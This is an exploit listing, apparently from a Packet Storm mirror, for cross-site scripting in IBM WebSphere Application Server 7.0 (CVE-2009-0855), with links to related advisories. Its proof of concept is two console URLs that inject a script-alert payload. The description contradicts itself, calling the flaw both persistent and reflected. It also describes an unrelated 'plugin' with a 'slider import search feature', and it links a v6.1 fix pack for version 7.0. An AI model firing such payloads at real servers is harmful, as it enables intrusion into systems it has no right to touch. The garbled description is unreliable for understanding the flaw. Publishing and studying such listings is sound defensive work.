Lucene search
Milad KarimiPACKETSTORM:170073HistoryDec 02, 2022 - 12:00 a.m.
IBM Websphere Application Server 7.0 Cross Site Scripting
2022-12-0200:00:00
Milad Karimi
packetstormsecurity.com
203
ibm websphere application server
cross-site scripting
persistent
authenticated
windows 10
cve 2009-0855
EPSS
0.421
Percentile
97.4%
`# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-12-02
# Author: Milad karimi
# Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows
# Version: 7.0
# Tested on: Windows 10
# CVE: 2009-0855
1. Description:
This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp
`
Related
prion
prion
Cross site scripting
2009-03-09 21:30:00
exploitdb
exploitdb
nvd
nvd
CVE-2009-0855
2009-03-09 21:30:00
cve
cve
CVE-2009-0855
2009-03-09 21:30:00
checkpoint_advisories
checkpoint_advisories
IBM WebSphere Application Server Cross-Site Scripting - Ver2 (CVE-2009-0855)
2014-03-31 00:00:00
cvelist
cvelist
CVE-2009-0855
2009-03-09 00:00:00
nessus
nessus
IBM WebSphere Application Server < 6.1.0.23 Multiple Flaws
2009-04-15 00:00:00